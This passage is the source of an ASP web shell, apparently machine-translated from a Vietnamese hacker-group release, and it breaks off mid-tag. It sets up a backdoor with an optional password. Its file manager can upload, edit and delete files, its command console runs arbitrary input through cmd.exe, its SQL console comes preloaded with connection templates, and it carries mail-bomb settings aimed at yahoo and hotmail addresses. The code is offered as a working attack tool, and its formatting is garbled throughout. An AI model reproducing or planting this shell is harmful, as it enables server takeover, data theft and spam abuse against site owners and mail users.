There is nothing special, that is, there is an additional mail forgery function.
[Code]
<%
Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
Email: forever5pi@yahoo.com
Web: http://vnhacker.org
Thanks for friend cnfjhh
Option explicit
Server. ScriptTimeout = 10000
Response. Buffer = false
Dim gURL, gMsg
Dim targetPath, cp_dst, mv_dst, root
Dim FSO, re
Dim zombie_array, special_array
###################################### CONFIGURATION # #####################################
Const gPassword = "" mat khau ("": khong dung password)
Const gMax = 50 chieu dai toi da cho ten file
Const gBomb = 1000 so luong mail mac dinh can bomb
Const lnkExt = "lnk, url"
Const editExt = "htm, html, asp, asa, txt, inc, css, aspx, js, vbs, shtm, shtml, xml, xsl, log, ini, bat, bak "danh sach cac file cho phep edit
Const TmpDir = "C:" thu muc tam thoi mac dinh
Const Shell = "cmd.exe" shell mac dinh
Cac chuoi ket noi mac dinh
Const cstrMSSQL = "Provider = SQLOLEDB; Data Source = SERVER_NAME; database = DB_NAME; uid = UID; pwd = PWD"
Const cstrJET = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source = full_path/db_file.mdb"
Const cstrACCESS = "DRIVER = {Microsoft Access Driver (*. mdb)}; DBQ = full_path/db_file.mdb"
Const cstrORACLE = "Provider = OraOLEDB. Oracle.1; Data Source = DB_NAME; User ID = UID; Password = PWD"
Const cstrMYSQL = "Driver = MySQL; server = SERVER_IP; uid = UID; pwd = PWD; database = DB_NAME"
Const cstrDSN = "DSN_NAME"
Const bSize = false co/khong hien folder-size
Const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 _-" tap ki thu dung de sinh chuoi ngau nhien
Zombie_array = array ("com", "net", "org", "info", "vn", "cn") mang cac domain z0mbie
Special_array = array ("yahoo.com", "hotmail.com") mang cac domain dac biet (dung trong bomb mail)
Root = Server. MapPath (".") folder mac dinh
######################################## ######################################## ###########
GURL = Request. ServerVariables ("SCRIPT_NAME ")
Init ()
If (LCase (Left (Request. serverVariables ("HTTP_CONTENT_TYPE"), 19) = "multipart/form-data") and (Session ("allow") = 1) and (Session ("mode ") = 0) then Upload ()
Secure ()
If Request. Form ("command") = "Logout" then Logout ()
If Request. Form ("command") = "ChangeMode" then
Session ("mode") = Request. Form ("mode ")
Session ("switch") = true
End if
Select case Session ("mode ")
Case 0 myFile ()
Case 1 myCMD ()
Case 2 mySQL ()
Case 3 myMail ()
End select
######################################## ######################################## ###########
Sub myFile ()
If Session ("switch") = true then
TargetPath = Session ("targetPath ")
If targetPath = "" then targetPath = root
Session ("switch") = false
Else
TargetPath = Trim (Request. Form ("folder "))
If targetPath = "" then targetPath = root else targetPath = abspath (targetPath)
Select case Request. Form ("command ")
Case "Download"
Download ()
Exit sub
Case "Edit"
Editor ()
Exit sub
Case "ChangeAttributesFile", "ChangeAttributesFolder"
ChangeAttributesItem ()
Exit sub
Case "Tree"
Tree ()
Exit sub
Case "Delete" Delete ()
Case "Move" Move ()
Case "Copy" Copy ()
Case "ZipInfo" ZipInfo ()
Case "NewFile", "NewFolder" CreateItem ()
Case "RenameFile", "RenameFolder" RenameItem ()
Case "OpenFolder" OpenFolder ()
Case "LevelUp" targetPath = FSO. GetParentFolderName (abspath (Request. Form ("folder ")))
Case "LevelRoot" targetPath = findroot (abspath (Request. Form ("folder ")))
End select
Session ("targetPath") = targetPath
End if
HtmlHeader ("")
HtmlMode ()
List ()
HtmlFooter ()
Destroy ()
End sub
######################################## ######################################## ###########
Sub myCMD ()
Dim bDoIt
Dim bEcho
Dim szTmpDir, szShell, szCmd, szTmpFile
Dim oScript, oScriptNet, oFile
HtmlHeader ("")
HtmlMode ()
Set oScript = Server. CreateObject ("Wscript. Shell ")
Set oScriptNet = Server. CreateObject ("Wscript. Network ")
SzTmpDir = Trim (Request. Form ("tmpdir "))
SzShell = Trim (Request. Form ("shell "))
SzCmd = Trim (Request. Form ("cmd "))
BEcho = CBool (Request. Form ("echo "))
If Session ("switch") = true then
Session ("switch") = false
BDoit = false
SzTmpDir = Session ("szTmpDir ")
SzShell = Session ("szShell ")
SzCmd = Session ("szCmd ")
BEcho = Session ("bEcho ")
Else
BDoIt = true
End if
If szTmpDir = "" then szTmpDir = TmpDir else szTmpDir = abspath (szTmpDir)
If szShell = "" then szShell = Shell
Session ("szTmpDir") = szTmpDir
Session ("szShell") = szShell
Session ("szCmd") = szCmd
Session ("bEcho") = bEcho
%>
<Form name = frmCMD method = post action = "<% = gURL %>">
<Table>
<Tr> <td> <B> T </B> mpDir: </td> <input type = text name = tmpdir value = "<% = Server. htmlEncode (szTmpDir) %> "size = 20> </td> </tr>
<Tr> <td> <B> S </B> hell: </td> <input type = text name = shell value = "<% = Server. htmlEncode (szShell) %> "size = 20> </td> </tr>
<Tr> <td> <B> C </B> md: </td> <input type = text name = cmd value = "<% = Server. htmlEncode (szCmd) %> "size = 80> <input type = submit value = Go> </td> </tr>
<Tr> <td> <B> E </B> ch </td> <input type = checkbox name = echo value = 1 <% if bEcho then Response. write "checked" % >></td> </tr>
</Table>
</Form>
<Script> frmCMD. cmd. focus () </script>
<%
If (szCmd <> "") and (bDoIt = true) then
If bEcho then
Call oScript. Run (szShell & "/c" & szCmd)
Else
SzTmpFile = addslash (szTmpDir) & FSO. GetTempName
Call oScript. Run (szShell & "/c" & szCmd & ">" & szTmpFile, 0, true)
If FSO. FileExists (szTmpFile) then set oFile = FSO. OpenTextFile (szTmpFile, 1, false, 0)
End if
End if
%>
<P> <% = FormatDate (Now) %>
<P> <B> I </B> P: <% = Request. ServerVariables ("LOCAL_ADDR") %> <br>
<B> U </B> ser: \ <% = oScriptNet. UserName % ">\< % = oScriptNet. ComputerName % >\< % = oScriptNet. UserName %>
<%
If (IsObject (oFile) then
On error resume next
%>
<Pre>
<% = Server. HtmlEncode (oFile. ReadAll) %>
</Pre>
<%
OFile. Close
Call FSO. DeleteFile (szTmpFile, true)
End if
Set oScript = nothing
Set oScriptNet = nothing
HtmlFooter ()
Destroy ()
End sub
######################################## ######################################## ###########
Sub mySQL ()
Dim szConn, szSQL1, szSQL2, szSQL, bDoIt
Dim intChoice
HtmlHeader ("")
HtmlMode ()
SzConn = Trim (Request. Form ("conn "))
SzSQL1 = Trim (Request. Form ("sql1 "))
SzSQL2 = Trim (Request. Form ("sql2 "))
IntChoice = CInt (Request. Form ("choice "))
If Session ("switch") = true then
Session ("switch") = false
BDoIt = false
SzConn = Session ("szConn ")
SzSQL1 = Session ("szSQL1 ")
SzSQL2 = Session ("szSQL2 ")
IntChoice = Session ("intChoice ")
Else
BDoIt = true
End if
If intChoice = 0 then intChoice = 1
If intChoice = 1 then szSQL = szSQL1 else szSQL = szSQL2
Session ("szConn") = szConn
Session ("szSQL1") = szSQL1
Session ("szSQL2") = szSQL2
Session ("intChoice") = intChoice
Select case trim (ucase (szConn ))
Case "MSSQL"
SzConn = cstrMSSQL
SzSQL = ""
Case "JET"
SzConn = cstrJET
SzSQL = ""
Case "ACCESS"
SzConn = cstrACCESS
SzSQL = ""
Case "ORACLE"
SzConn = cstrORACLE
SzSQL = ""
Case "MYSQL"
SzConn = cstrMYSQL
SzSQL = ""
Case "DSN"
SzConn = cstrDSN
SzSQL = ""
End select
%>
<Input type = button value = "<->" onclick = "changeInput ()">
<F